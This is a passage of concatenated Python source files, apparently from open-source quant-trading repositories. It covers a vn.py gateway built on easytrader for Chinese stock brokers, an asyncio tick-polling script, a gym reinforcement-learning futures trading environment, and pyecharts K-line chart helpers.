lines = self.build_lines(font_size)
size = self.get_max_text_size(lines, font_size)
height_sum = len(lines) * size[1]
height = int((self.height - height_sum) / 2) - \
int(size[1] / 5)
lines = [' '.join(line) for line in lines if line]
for index, line in enumerate(lines):
total_size = self.get_text_size(font_size, line)
x_left = int(self.x + ((self.text_box_width - total_size[0]) / 2))
self.write_text((x_left, height), line,
font_size, color)
height += size[1]
return self.image
``` |
{
"source": "jojoquant/acestock",
"score": 2
} |
#### File: acestock/acestock/td.py
```python
import asyncio
import threading
import datetime
from asyncio import AbstractEventLoop
from copy import copy
from typing import Dict
from easytrader import remoteclient
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.constant import Exchange, Direction, Offset, Status
from vnpy.trader.database import DATETIME_TZ
from vnpy.trader.object import AccountData, PositionData, CancelRequest, OrderRequest, OrderData, TradeData
MARKET2VT: Dict[str, Exchange] = {
"深圳": Exchange.SZSE,
"上海": Exchange.SSE,
}
class TradeDataTD:
def __init__(self, gateway: BaseGateway):
self.gateway = gateway
self.api = None
self.api_setting = {}
self.thread: threading.Thread = None
self.loop: AbstractEventLoop = None
self.non_ths_client_list = ['htzq_client', 'ht_client', "gj_client"]
self.ths_client_list = ['universal_client']
self.datetime_format = "%Y-%m-%d %H:%M:%S"
def start_loop(self, loop):
"""
轮询
使用easytrader查询1s ?? 变化的 当日成交 信息, 用于on_trade, 更新策略中的pos信息
easytrader 还可以查询当日委托, 可以对比出 未成交单
"""
asyncio.set_event_loop(loop)
try:
self.gateway.write_log("交易线程中启动协程 loop ...")
loop.run_forever()
except BaseException as err:
self.gateway.write_log("交易线程中启动协程 loop 出现问题!")
self.gateway.write_log(err)
def connect(self, setting):
self.api_setting = setting
if setting['broker'] in self.non_ths_client_list:
self.api = remoteclient.use(**setting)
elif setting['broker'] in self.ths_client_list:
            # generic Tonghuashun (THS) client
            self.api = remoteclient.use(**setting)
            # remoteclient has trouble typing stock codes into the THS editor remotely;
            # the method below does not exist there:
            # self.api.enable_type_keys_for_editor()
            self.gateway.write_log("同花顺远程输入代码存在问题, 注意测试 buy/sell 功能")
        else:
            # broker-specific THS clients do not support automatic login:
            # log in manually first, then call connect() to attach to the already-running client
self.gateway.write_log("多线程不支持其他券商专用同花顺客户端")
try:
self.api.prepare(**setting)
self.gateway.write_log("交易服务器连接成功!")
self.query_account()
self.query_position()
except Exception as e:
self.gateway.write_log(f"交易服务器连接失败! {e}")
try:
            self.loop = asyncio.new_event_loop()  # create an event loop for the worker thread; start_loop() will run it
            self.thread = threading.Thread(target=self.start_loop, args=(self.loop,))  # run the loop in a dedicated thread
self.gateway.write_log("启动交易线程...")
self.thread.start()
except BaseException as err:
self.gateway.write_log("交易线程启动出现问题!")
self.gateway.write_log(err)
def query_account(self) -> None:
"""查询资金"""
try:
ret = self.api.balance
if self.api_setting['broker'] in self.non_ths_client_list:
account: AccountData = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=self.api_setting['broker'],
balance=ret['总资产'],
frozen=ret['总资产'] - ret['可用金额']
)
elif self.api_setting['broker'] in self.ths_client_list:
account: AccountData = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=ret['资金账号'],
balance=ret['总资产'],
frozen=ret['总资产'] - ret['可用资金']
)
else:
account: AccountData = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=ret['资金账号'],
balance=ret['总资产'],
frozen=ret['总资产'] - ret['可用资金']
)
self.gateway.on_account(account)
self.gateway.write_log("账户资金查询成功")
except BaseException as err:
self.gateway.write_log("账户资金查询失败")
self.gateway.write_log(err)
def query_position(self) -> None:
"""查询持仓"""
try:
ret_list = self.api.position
for ret in ret_list:
trade_market_key = "交易市场"
if trade_market_key in ret:
if ("沪" in ret[trade_market_key]) or ("上海" in ret[trade_market_key]):
ret[trade_market_key] = "上海"
elif ("深" in ret[trade_market_key]) or ("深圳" in ret[trade_market_key]):
ret[trade_market_key] = "深圳"
if self.api_setting['broker'] in self.non_ths_client_list:
position = PositionData(
symbol=str(ret["证券代码"]),
exchange=MARKET2VT[ret["交易市场"]] if ret["交易市场"] else Exchange.SSE,
direction=Direction.LONG,
volume=float(ret["股票余额"]),
frozen=float(ret["冻结数量"]),
price=float(ret["成本价"]),
pnl=float(ret["盈亏"]),
yd_volume=float(ret["可用余额"]),
gateway_name=self.gateway.gateway_name
)
elif self.api_setting['broker'] in self.ths_client_list:
position = PositionData(
symbol=str(ret["证券代码"]),
exchange=MARKET2VT[ret["交易市场"]] if ret["交易市场"] else Exchange.SSE,
direction=Direction.LONG,
volume=float(ret["当前持仓"]),
frozen=float(ret["当前持仓"] - ret["股份可用"]),
price=float(ret["参考成本价"]),
pnl=float(ret["参考盈亏"]),
yd_volume=float(ret["股份可用"]),
gateway_name=self.gateway.gateway_name
)
else:
position = PositionData(
symbol=str(ret["证券代码"]),
exchange=MARKET2VT[ret["交易市场"]] if ret["交易市场"] else Exchange.SSE,
direction=Direction.LONG,
volume=float(ret["当前持仓"]),
frozen=float(ret["当前持仓"] - ret["股份可用"]),
price=float(ret["参考成本价"]),
pnl=float(ret["参考盈亏"]),
yd_volume=float(ret["股份可用"]),
gateway_name=self.gateway.gateway_name
)
self.gateway.on_position(position)
self.gateway.write_log("账户持仓查询成功")
except BaseException as err:
self.gateway.write_log("账户持仓查询失败")
self.gateway.write_log(err)
def send_order(self, req: OrderRequest) -> str:
"""委托下单"""
order_id = None
try:
if req.offset == Offset.OPEN:
ret = self.api.buy(security=req.symbol, price=round(req.price, 2), amount=req.volume)
order_id = ret.get('entrust_no', "success")
order = req.create_order_data(order_id, self.gateway.gateway_name)
order.status = Status.SUBMITTING
self.gateway.orders[order_id] = order
self.gateway.on_order(copy(order))
elif req.offset == Offset.CLOSE:
ret = self.api.sell(security=req.symbol, price=round(req.price, 2), amount=req.volume)
order_id = ret.get('entrust_no', "success")
order = req.create_order_data(order_id, self.gateway.gateway_name)
order.status = Status.SUBMITTING
self.gateway.orders[order_id] = order
self.gateway.on_order(copy(order))
if order_id == "success":
self.gateway.write_log("系统配置未设置返回成交回报, 将影响撤单操作")
order_id = "xxxxxx" if order_id is None else order_id
order = req.create_order_data(order_id, self.gateway.gateway_name)
order.status = Status.SUBMITTING
self.gateway.orders[order_id] = order
self.gateway.on_order(copy(order))
except BaseException as e:
order_id = "xxxxxx" if order_id is None else order_id
order = req.create_order_data(order_id, self.gateway.gateway_name)
order.status = Status.REJECTED
self.gateway.on_order(copy(order))
msg: str = f"开仓委托失败,信息:{e}"
self.gateway.write_log(msg)
finally:
# check today trades
trade = self.get_order_traded_data(order)
if trade is not None:
self.gateway.on_trade(copy(trade))
order.status = Status.ALLTRADED
self.gateway.orders[order_id] = order
self.gateway.on_order(copy(order))
return order.vt_orderid
def get_order_traded_data(self, order: OrderData) -> TradeData:
try:
for trade in self.api.today_trades:
trade_datetime = datetime.datetime.strptime(
f"{datetime.datetime.now(DATETIME_TZ).date()} {trade['成交时间'] if trade['成交时间'] else '00:00:00'}",
self.datetime_format
).replace(tzinfo=DATETIME_TZ)
if order.orderid == trade['合同编号']:
trade = TradeData(
symbol=order.symbol,
exchange=order.exchange,
orderid=order.orderid,
tradeid=trade['成交编号'],
direction=order.direction,
offset=order.offset,
price=float(trade['成交均价']),
                        volume=float(order.volume),  # in theory float(trade['成交数量']); fills can be reported twice, so the order volume is used instead
datetime=trade_datetime,
gateway_name=self.gateway.gateway_name,
)
return trade
return None
except BaseException as e:
self.gateway.write_log(f"获取订单成交数据出错: {e}")
return None
def cancel_order(self, req: CancelRequest) -> None:
"""委托撤单"""
# check today order
try:
for order in self.api.today_entrusts:
if order['合同编号'] == req.orderid and order['委托状态'] == "未成交":
r = self.api.cancel_entrust(req.orderid)
if "成功" in r.get('message', ''):
self.gateway.write_log(r['message'])
else:
self.gateway.write_log(f"[{req.orderid}]撤单失败")
else:
self.gateway.write_log(
f"[{req.orderid}]不满足撤单条件无法撤单 或 未在交易委托系统中生成订单无需撤单"
)
except BaseException as e:
self.gateway.write_log(f"取消订单成交数据出错: {e}")
def close(self):
if self.api is not None:
self.api.exit()
self.gateway.write_log("交易服务器断开连接")
```
#### File: acestock/example/async_script2.py
```python
import asyncio
from functools import partial
from tzlocal import get_localzone
import pandas as pd
from jotdx.quotes import Quotes
from datetime import datetime
# client = Quotes.factory(market='std')
# params = {"symbol": "600032", "start": 0, "offset": 50}
# df = partial(client.transaction, **params)()
# print(1)
from vnpy.trader.constant import Exchange
from vnpy.trader.object import TickData, SubscribeRequest
def trans_tick_df_to_tick_data(tick_df, req:SubscribeRequest):
last_price = tick_df['price'][0]
last_volume = tick_df['vol'][0]
    # num is stored in turnover because BarGenerator accumulates turnover,
    # while open_interest is taken as a snapshot rather than accumulated
    last_num = tick_df['num'][0]
    # buyorsell: 0 = buy, 1 = sell
    # buyorsell = tick_df['buyorsell'][0]
tz = get_localzone()
tick_datetime = datetime.now(tz)
tick = TickData(
gateway_name="paper",
symbol=req.symbol,
exchange=req.exchange,
datetime=tick_datetime,
volume=last_volume,
turnover=last_num,
last_price=last_price,
)
return tick
async def func(req: SubscribeRequest):
client = Quotes.factory(market='std')
loop = asyncio.get_event_loop()
params = {"symbol": req.symbol, "start": 0, "offset": 1}
last_tick_df = await loop.run_in_executor(None, partial(client.transaction, **params))
tz = get_localzone()
tick_datetime = datetime.now(tz)
start_datetime = datetime(
year=tick_datetime.year, month=tick_datetime.month, day=tick_datetime.day,
hour=9, minute=30, second=0, microsecond=0, tzinfo=tz)
end_datetime = datetime(
year=tick_datetime.year, month=tick_datetime.month, day=tick_datetime.day,
hour=15, minute=0, second=0, microsecond=0, tzinfo=tz)
if start_datetime <= tick_datetime <= end_datetime:
pass
while True:
print(f"{req.symbol} func...")
df1 = await loop.run_in_executor(None, partial(client.transaction, **params))
last_tick_df = last_tick_df.append(df1).drop_duplicates()
if len(last_tick_df) != 1:
last_tick_df = df1
tick = trans_tick_df_to_tick_data(last_tick_df, req)
print("推送df1 -> tick: ", tick)
await asyncio.sleep(1.5)
df2 = await loop.run_in_executor(None, partial(client.transaction, **params))
last_tick_df = last_tick_df.append(df2).drop_duplicates()
if len(last_tick_df) != 1:
last_tick_df = df2
tick = trans_tick_df_to_tick_data(last_tick_df, req)
print("推送df2 -> tick: ", tick)
await asyncio.sleep(1.5)
async def async_timer(second=10):
while True:
print(f"time sleep {second}s")
await asyncio.sleep(second)
# symbol_list = ['128050', "110051", "128096", "113039"]
symbol_list = [
SubscribeRequest('128050', Exchange.SZSE),
SubscribeRequest("600032", Exchange.SSE)
]
# symbol_list = []
task_list = [func(s) for s in symbol_list] + [async_timer(10)]
# done, pending = asyncio.run(asyncio.wait(task_list, timeout=10))
done, pending = asyncio.run(asyncio.wait(task_list))
# task_list = [asyncio.create_task(func(s)) for s in symbol_list]
# loop = asyncio.get_event_loop()
# loop.run_forever()
# print(pending)
# print(done)
``` |
{
"source": "jojoquant/jnpy",
"score": 3
} |
#### File: cta_backtester/DRL/environ_future.py
```python
import random
import pandas as pd
import numpy as np
import gym
DEFAULT_BARS_COUNT = 10
DEFAULT_COMMISSION_RATE = 2.5 / 10000
DEFAULT_TIME_COST = 0.1 / 10000
DEFAULT_SECURITY_RATE = 9 / 100  # margin rate, 9% for rebar futures for now
DEFAULT_CONTRACT_PROD = 10  # contract multiplier
BALANCE = 1.0e6
class FutureEnv(gym.Env):
metadata = {'render.modes': ['human']}
def __init__(
self, prices_df: pd.DataFrame,
bars_count: int = DEFAULT_BARS_COUNT,
commission_rate: float = DEFAULT_COMMISSION_RATE,
time_cost: float = DEFAULT_TIME_COST,
balance: float = BALANCE,
security_rate: float = DEFAULT_SECURITY_RATE,
contract_prod: int = DEFAULT_CONTRACT_PROD
):
assert commission_rate >= 0.0, "佣金比例 should >= 0.0"
assert contract_prod > 0, "合约乘数 should > 0"
assert security_rate > 0.0, "保证金比率 should > 0.0"
assert time_cost >= 0.0, "Time cost should >= 0.0"
assert balance >= 0.0, "Balance should >= 0.0"
assert len(prices_df) > 0, "DataFrame length should > 0"
        self.ix = 0  # start index of the data for each episode
        self.step_len = bars_count  # number of bars per observation window
        self.step_n = 1  # stride between consecutive observations; fixed to 1 bar for simplicity, change the input bar period instead
        self.commission_rate = commission_rate  # commission rate
        self.contract_prod = contract_prod  # contract multiplier
        self.security_rate = security_rate  # margin rate
self.time_cost = time_cost
self.start_balance = balance
self.initial_global_var()
self.prices_df_columns_list = list(prices_df.columns)
self.account_position_columns_list = [
'net_position', 'long_position', 'short_position' # , 'trade_num'
]
self.account_value_columns_list = [
'balance', 'hold_share_value', 'hold_money_value' # , 'profit'
]
for col in self.account_position_columns_list + self.account_value_columns_list:
prices_df[col] = self.start_balance if (col == 'balance' or col == 'hold_money_value') else 0.0
self.prices_df = prices_df
self.prices_df_length = len(prices_df)
self.cur_state_df = pd.DataFrame()
self.trade_record_df = pd.DataFrame()
self.action_space = gym.spaces.Box(low=-1.0, high=1.0, shape=(1,), dtype=np.float32)
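        # the single action value in [-1, 1] is interpreted as the fraction of available
        # cash (when opening) or of the current position (when closing) to trade; its sign
        # selects the direction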
# shape 为 df columns (包含时间, 去掉日期) + position + reward
self.observation_space = gym.spaces.Box(low=-np.inf, high=np.inf,
shape=(self.prices_df.shape[1] * self.step_len,),
dtype=np.float32)
def initial_global_var(self):
self.hold_money_value = self.start_balance
self.hold_share_value = 0.0
        self.net_position = 0  # signed
        self.long_position = 0  # unsigned
        self.short_position = 0  # unsigned
        self.have_long_position = False  # holding a long position?
        self.have_short_position = False  # holding a short position?
        self.new_df_first_bar_open_price = 0.0  # fill price used for opening trades
self.buy_condition = False
self.sell_condition = False
self.short_condition = False
self.cover_condition = False
def reset(self):
""" 初始化第一个state, 默认上面没有任何操作"""
self.initial_global_var()
self.ix = random.choice(range(len(self.prices_df) - self.step_len))
self.cur_state_df = self.prices_df.iloc[self.ix: self.ix + self.step_len, :].copy()
        # when initializing the starting state, a long/short position could exist on some bar;
        # Sell/Cover closing actions are excluded here
# start_position_index = random.choice(range(self.step_len))
# start_position = random.choice([i for i in Actions if (i != Actions.Cover and i != Actions.Sell)])
# start_position_index += self.ix
# self.cur_state_df['position'][start_position_index] = start_position
# if start_position != Actions.Skip:
# pass
# self.total_position = start_position
# self.offset_total_price = self.cur_state_df['open_price'][start_position_index] * self.total_position
return self.cur_state_df
def reset_from_start(self):
""" 初始化第一个state, 用于回测"""
self.initial_global_var()
self.cur_state_df = self.prices_df.iloc[self.ix: self.ix + self.step_len, :].copy().reset_index(drop=True)
return self.cur_state_df
def update_new_df(self, action: float, new_df: pd.DataFrame, commission: float, trade_num: int):
"""
记录 开平仓价格 和 位置,
给出step_reward均摊更新到new step的每个bar上
更新持仓信息
"""
new_df = self.update_new_df_position_info(trade_num, new_df)
        # cash actually required for the trade_num lots traded this step
trade_share_on_first_bar_open_value = trade_num \
* self.contract_prod \
* self.new_df_first_bar_open_price \
* self.security_rate
        # adjust cash by that amount plus commission, depending on trade direction
if self.buy_condition or self.sell_condition:
self.hold_money_value -= (trade_share_on_first_bar_open_value + commission)
elif self.short_condition or self.cover_condition:
self.hold_money_value += (trade_share_on_first_bar_open_value - commission)
        # remaining cash
new_df.loc[:, 'hold_money_value'] = self.hold_money_value
        # update the trade record table
if self.trade_record_df.empty:
self.trade_record_df = new_df.iloc[[0]]
self.trade_record_df = self.trade_record_df.append(new_df.iloc[0])
        # mark-to-market account value
if self.buy_condition or self.sell_condition:
            # real-time value of the held contracts
new_df.loc[:, 'hold_share_value'] = new_df.apply(
lambda x: x['close_price'] * self.contract_prod * self.security_rate * x['long_position'],
axis=1
)
new_df.loc[:, 'balance'] = new_df.loc[:, 'hold_share_value'] + self.hold_money_value
# new_df['profit'] = new_df['balance'] - self.start_balance
elif self.short_condition or self.cover_condition:
new_df.loc[:, 'hold_share_value'] = new_df.apply(
lambda x: x['close_price'] * self.contract_prod * self.security_rate * abs(x['short_position']), axis=1)
new_df.loc[:, 'balance'] = 2 * (self.start_balance - commission) - abs(
new_df.loc[:, 'hold_share_value']) - self.hold_money_value
# new_df['profit'] = new_df['balance'] - self.start_balance
        # after the branches above, refresh the long/short holding flags
self.have_long_position = True if self.long_position > 0 else False
self.have_short_position = True if self.short_position > 0 else False
return new_df, new_df['balance'].iloc[-1] - self.start_balance
def get_cur_state_trade_num_by_money(self, action: float, current_price: float):
"""通过多空仓位资金使用比例, 计算当前状态下最后一根bar收盘价可交易的数量"""
# (买入比例 * 账户金额) / (当前价格 * 合约乘数 * (保证金比例 + 手续费率)) = 交易手数
return round(
(action[0] * self.hold_money_value) /
(current_price * self.contract_prod * (self.security_rate + self.commission_rate))
)
def get_cur_state_trade_num_by_share(self, action: float, current_price: float):
"""通过持仓可使用比例, 计算当前状态下最后一根bar收盘价可交易的数量"""
# (买入比例 * 账户金额) / (当前价格 * 合约乘数 * 保证金比例) = 交易手数
return round(action[0] * abs(self.net_position))
def get_next_state_commission(self, trade_num):
""" float: = 交易手数 * 合约乘数 * 成交价格(open) * 交易费率 """
return abs(trade_num) * self.contract_prod * self.new_df_first_bar_open_price * self.commission_rate
def step(self, action: float):
        # produce the next observation
        # obs carries the running (global) reward, which the agent needs to account for in its design
obs = self.cur_state_df.iloc[self.step_n:, :]
obs_last_index = self.cur_state_df.index.to_list()[-1]
reward = 0
done = False
        # update the action conditions
self.buy_condition = action > 0.0 and not self.have_short_position
self.sell_condition = action < 0.0 and self.have_long_position
self.short_condition = action < 0.0 and not self.have_long_position
self.cover_condition = action > 0.0 and self.have_short_position
if obs_last_index + 1 + self.step_n > self.prices_df_length:
done = True
info = {}
return obs, reward, done, info
new_df = self.prices_df.iloc[obs_last_index + 1: obs_last_index + 1 + self.step_n].copy()
        # first open price of the new bars, used to size the trade
        self.new_df_first_bar_open_price = new_df.loc[:, 'open_price'].iloc[0]
        # buy/short size the trade from available cash, sell/cover from the held position
        if self.buy_condition or self.short_condition:
            # signed, same sign as the action
            trade_num = self.get_cur_state_trade_num_by_money(action, self.new_df_first_bar_open_price)
        else:
            trade_num = self.get_cur_state_trade_num_by_share(action, self.new_df_first_bar_open_price)
commission = self.get_next_state_commission(trade_num) # no sign >= 0
        # work out the reward and done flag for the next state
        # TODO: the environment assumes long and short positions are never held at the same
        # time, so the trained model should not exhibit that behaviour either
        # open long (buy)
if self.buy_condition:
self.long_position += trade_num
new_df, reward = self.update_new_df(action, new_df, commission, trade_num)
        # close long (sell)
        elif self.sell_condition:
            # the long position cannot be reduced by more than is held; anything larger flattens it
trade_num, done = (trade_num, False) if abs(trade_num) < self.long_position else (-self.long_position, True)
self.long_position += trade_num
new_df, reward = self.update_new_df(action, new_df, commission, trade_num)
        # open short
        elif self.short_condition:
            self.short_position += abs(trade_num)  # short_position is unsigned, trade_num is signed
new_df, reward = self.update_new_df(action, new_df, commission, trade_num)
        # close short (cover)
        elif self.cover_condition:
            trade_num, done = (trade_num, False) if trade_num < self.short_position else (self.short_position, True)
            self.short_position -= trade_num  # note: this reduces the short position
new_df, reward = self.update_new_df(action, new_df, commission, trade_num)
        # skip, or e.g. already holding longs and still receiving a buy-style action
else:
reward -= self.time_cost
trade_num = 0
new_df = self.update_new_df_position_info(trade_num, new_df)
new_df.loc[:, 'hold_money_value'] = self.hold_money_value
new_df.loc[:, 'hold_share_value'] = new_df.apply(
lambda x: x['close_price'] * self.contract_prod * self.security_rate * abs(x['net_position']), axis=1)
if self.have_long_position:
new_df.loc[:, 'balance'] = new_df.loc[:, 'hold_share_value'] + self.hold_money_value
# new_df['profit'] = new_df['balance'] - self.start_balance
elif self.have_short_position:
new_df.loc[:, 'balance'] = 2 * self.start_balance - abs(
new_df.loc[:, 'hold_share_value']) - self.hold_money_value
# new_df['profit'] = new_df['balance'] - self.start_balance
obs = obs.append(new_df)
self.cur_state_df = obs
obs_last_index = obs.index.to_list()[-1]
if obs_last_index + 1 + self.step_n >= self.prices_df_length:
done = True
info = {}
return obs, reward, done, info
def update_new_df_position_info(self, trade_num: int, new_df: pd.DataFrame):
# new_df['trade_num'] = trade_num
new_df.loc[:, 'long_position'] = self.long_position
new_df.loc[:, 'short_position'] = self.short_position
self.net_position = self.long_position - self.short_position
new_df.loc[:, 'net_position'] = self.net_position
return new_df
def render(self, mode='human', close=False):
pass
def close(self):
pass
if __name__ == "__main__":
df = pd.read_csv("./data/RBL8.csv")
columns_list = [
'open_price', 'high_price', 'low_price', 'close_price',
'open_interest', 'volume'
]
df = df[columns_list]
env = FutureEnv(prices_df=df)
action = env.action_space.sample()
initial_state_df = env.reset()
    # feed the initial state into the model to produce an output action
reward_list = []
done_list = []
obs0, reward, done, info = env.step(action)
reward_list.append(reward)
done_list.append(done)
for _ in range(100):
# action_key = random.choice(list(action_ratio_dict.keys()))
# action = action_ratio_dict[action_key]
action = env.action_space.sample()
print(action)
obs, reward, done, info = env.step(action)
obs0 = obs0.append(obs.iloc[[-1]])
reward_list.append(reward)
done_list.append(done)
print(1)
```
#### File: cta_backtester/ui/KLine_pro_pyecharts.py
```python
import numpy as np
import pandas as pd
from pyecharts import options as opts
from pyecharts.commons.utils import JsCode
from pyecharts.charts import Kline, Line, Bar, Grid
from jnpy.utils.data_manager import ArrayManagerWithDatetime
from jnpy.utils.utils_log import LogModule
from vnpy.trader.utility import get_folder_path
from vnpy.trader.constant import Status, Offset, Direction
def gen_kline(xaxis_data_list, oclh_data_list, order_list):
kline = Kline()
kline.add_xaxis(xaxis_data=xaxis_data_list)
kline.add_yaxis(
series_name="",
y_axis=oclh_data_list,
itemstyle_opts=opts.ItemStyleOpts(
color="#ef232a",
color0="#14b143",
border_color="#ef232a",
border_color0="#14b143",
),
markpoint_opts=opts.MarkPointOpts(
data=[
opts.MarkPointItem(type_="max", name="最大值"),
opts.MarkPointItem(type_="min", name="最小值"),
*order_list
]
),
# markline_opts=opts.MarkLineOpts(
# label_opts=opts.LabelOpts(
# position="middle", color="blue", font_size=15
# ),
# data=split_data_part(),
# symbol=["circle", "none"],
# ),
)
    # this (commented-out) part would draw the boxes; the block above draws their diagonal connecting lines
# kline.set_series_opts(
# markarea_opts=opts.MarkAreaOpts(is_silent=True, data=split_data_part())
# )
kline.set_global_opts(
title_opts=opts.TitleOpts(title="K线周期图表", pos_left="0"),
xaxis_opts=opts.AxisOpts(
type_="category",
is_scale=True,
boundary_gap=False,
axisline_opts=opts.AxisLineOpts(is_on_zero=False),
splitline_opts=opts.SplitLineOpts(is_show=False),
split_number=20,
min_="dataMin",
max_="dataMax",
            axislabel_opts=opts.LabelOpts(is_show=True, rotate=-30),  # rotate the x-axis labels slightly
),
yaxis_opts=opts.AxisOpts(
is_scale=True, splitline_opts=opts.SplitLineOpts(is_show=True)
),
tooltip_opts=opts.TooltipOpts(trigger="axis", axis_pointer_type="line"),
datazoom_opts=[
opts.DataZoomOpts(
is_show=False, type_="inside", xaxis_index=[0, 0], range_end=100
),
opts.DataZoomOpts(
is_show=True, xaxis_index=[0, 1], pos_top="97%", range_end=100
),
opts.DataZoomOpts(is_show=False, xaxis_index=[0, 2], range_end=100),
            # opts.DataZoomOpts(is_show=False, xaxis_index=[0, 3], range_end=100),  # also link the third (balance-curve) axis
],
        # link the axes of the three sub-charts together
# axispointer_opts=opts.AxisPointerOpts(
# is_show=True,
# link=[{"xAxisIndex": "all"}],
# label=opts.LabelOpts(background_color="#777"),
# ),
)
return kline
def gen_tech_line(xaxis_data_list):
tech_line = Line()
tech_line.add_xaxis(xaxis_data=xaxis_data_list)
tech_line.set_global_opts(
xaxis_opts=opts.AxisOpts(
type_="category",
grid_index=1,
axislabel_opts=opts.LabelOpts(is_show=False),
),
yaxis_opts=opts.AxisOpts(
grid_index=1,
split_number=3,
axisline_opts=opts.AxisLineOpts(is_on_zero=False),
axistick_opts=opts.AxisTickOpts(is_show=False),
splitline_opts=opts.SplitLineOpts(is_show=False),
axislabel_opts=opts.LabelOpts(is_show=True),
),
)
return tech_line
def gen_volume_bar(xaxis_data_list, volume_list):
# Bar-1
volume_bar = Bar()
volume_bar.add_xaxis(xaxis_data=xaxis_data_list)
volume_bar.add_yaxis(
series_name="Volumn",
yaxis_data=volume_list,
xaxis_index=1,
yaxis_index=1,
label_opts=opts.LabelOpts(is_show=False),
        # the original echarts demo writes it this way:
# itemstyle_opts=opts.ItemStyleOpts(
# color=JsCode("""
# function(params) {
# var colorList;
# if (data.datas[params.dataIndex][1]>data.datas[params.dataIndex][0]) {
# colorList = '#ef232a';
# } else {
# colorList = '#14b143';
# }
# return colorList;
# }
# """)
# )
        # improved version: after add_js_funcs on the grid, it becomes the following
itemstyle_opts=opts.ItemStyleOpts(
color=JsCode(
"""
function(params) {
var colorList;
if (barData[params.dataIndex][1] > barData[params.dataIndex][0]) {
colorList = '#ef232a';
} else {
colorList = '#14b143';
}
return colorList;
}
"""
)
),
)
volume_bar.set_global_opts(
xaxis_opts=opts.AxisOpts(
type_="category",
grid_index=1,
axislabel_opts=opts.LabelOpts(is_show=False),
),
legend_opts=opts.LegendOpts(is_show=False),
)
return volume_bar
def gen_macd_bar_line(xaxis_data_list, macd_list, dif_list, deas_list):
# Bar-2 (Overlap Bar + Line)
bar_2 = (
Bar()
.add_xaxis(xaxis_data=xaxis_data_list)
.add_yaxis(
series_name="MACD",
yaxis_data=macd_list,
xaxis_index=2,
yaxis_index=2,
label_opts=opts.LabelOpts(is_show=False),
itemstyle_opts=opts.ItemStyleOpts(
color=JsCode(
"""
function(params) {
var colorList;
if (params.data >= 0) {
colorList = '#ef232a';
} else {
colorList = '#14b143';
}
return colorList;
}
"""
)
),
)
.set_global_opts(
xaxis_opts=opts.AxisOpts(
type_="category",
grid_index=2,
axislabel_opts=opts.LabelOpts(is_show=False),
),
yaxis_opts=opts.AxisOpts(
grid_index=2,
split_number=4,
axisline_opts=opts.AxisLineOpts(is_on_zero=False),
axistick_opts=opts.AxisTickOpts(is_show=False),
splitline_opts=opts.SplitLineOpts(is_show=False),
axislabel_opts=opts.LabelOpts(is_show=True),
),
legend_opts=opts.LegendOpts(is_show=False),
)
)
line_2 = (
Line()
.add_xaxis(xaxis_data=xaxis_data_list)
.add_yaxis(
series_name="DIF",
y_axis=dif_list,
xaxis_index=2,
yaxis_index=2,
label_opts=opts.LabelOpts(is_show=False),
)
.add_yaxis(
series_name="DEAS",
y_axis=deas_list,
xaxis_index=2,
yaxis_index=2,
label_opts=opts.LabelOpts(is_show=False),
)
.set_global_opts(legend_opts=opts.LegendOpts(is_show=False))
)
    # bottom panel: MACD bars overlapped with the DIF/DEAS lines
overlap_bar_line = bar_2.overlap(line_2)
return overlap_bar_line
def gen_order_list(orders):
order_list = []
if orders:
for order_data in orders:
if order_data.direction == Direction.LONG and order_data.offset == Offset.OPEN:
symbol = 'arrow'
symbol_size = 20
if order_data.status == Status.ALLTRADED:
item_style = opts.ItemStyleOpts(color='rgb(0,0,255)')
else:
item_style = opts.ItemStyleOpts(color='rgb(255,100,0)') # orange
elif order_data.direction == Direction.LONG and (
order_data.offset == Offset.CLOSE
or order_data.offset == Offset.CLOSETODAY
or order_data.offset == Offset.CLOSEYESTERDAY):
symbol = 'arrow'
symbol_size = 20
if order_data.status == Status.ALLTRADED:
item_style = opts.ItemStyleOpts(color='rgb(0,0,0)')
else:
item_style = opts.ItemStyleOpts(color='rgb(255,100,0)') # orange
elif order_data.direction == Direction.SHORT and order_data.offset == Offset.OPEN:
symbol = 'pin'
symbol_size = 40
if order_data.status == Status.ALLTRADED:
item_style = opts.ItemStyleOpts(color='rgb(0,0,255)')
else:
item_style = opts.ItemStyleOpts(color='rgb(255,100,0)') # orange
elif order_data.direction == Direction.SHORT and (
order_data.offset == Offset.CLOSE
or order_data.offset == Offset.CLOSETODAY
or order_data.offset == Offset.CLOSEYESTERDAY):
symbol = 'pin'
symbol_size = 40
if order_data.status == Status.ALLTRADED:
item_style = opts.ItemStyleOpts(color='rgb(0,0,0)')
else:
item_style = opts.ItemStyleOpts(color='rgb(255,100,0)') # orange
order_item = opts.MarkPointItem(
name=f"orderid_{order_data.orderid}",
coord=[str(order_data.datetime), order_data.price],
value=f"{order_data.price}\n{order_data.offset.value}\n{order_data.status.value}",
symbol=symbol,
symbol_size=symbol_size,
itemstyle_opts=item_style,
)
order_list.append(order_item)
return order_list
def gen_balance_line(result_df):
# head_df = pd.DataFrame()
# # TODO 这个循环需要优化速度
# iter_nums = len(x_axis_list) - result_df.shape[0]
# print(f"iter_nums: {iter_nums}")
# for i in range(iter_nums):
# print(i)
# head_df = head_df.append(result_df.iloc[0, :])
# result_df = head_df.append(result_df)
balance_line = Line()
if not isinstance(result_df, pd.DataFrame):
return balance_line
balance_line.add_xaxis(list(result_df.index))
yaxis_data_list = result_df['balance'].round().tolist()
balance_line.add_yaxis(
"balance",
y_axis=yaxis_data_list,
xaxis_index=3,
yaxis_index=3,
label_opts=opts.LabelOpts(is_show=False),
)
balance_line.set_global_opts(
xaxis_opts=opts.AxisOpts(
grid_index=3,
name_rotate=60,
),
yaxis_opts=opts.AxisOpts(
grid_index=3,
split_number=4,
is_scale=True,
),
legend_opts=opts.LegendOpts(is_show=False),
        # seems to have no effect?!
datazoom_opts=opts.DataZoomOpts(
is_show=True, type_="inside"),
)
return balance_line
def draw_chart(history, results, orders, strategy_tech_visual_list, result_df):
log_module = LogModule(name="pyecharts", level="info")
log_module.write_log("开始生成order_list...")
order_list = gen_order_list(orders)
log_module.write_log("order_list生成完成")
if history:
log_module.write_log("开始加载ArrayManager...")
am = ArrayManagerWithDatetime(size=len(history))
[am.update_bar(bar) for bar in history]
log_module.write_log("完成ArrayManager数据加载")
oclh_data_list = np.vstack((am.open, am.close, am.low, am.high)).T.tolist()
volume_list = am.volume.tolist()
x_axis_list = am.datetime_list
log_module.write_log("开始Kline实例化...")
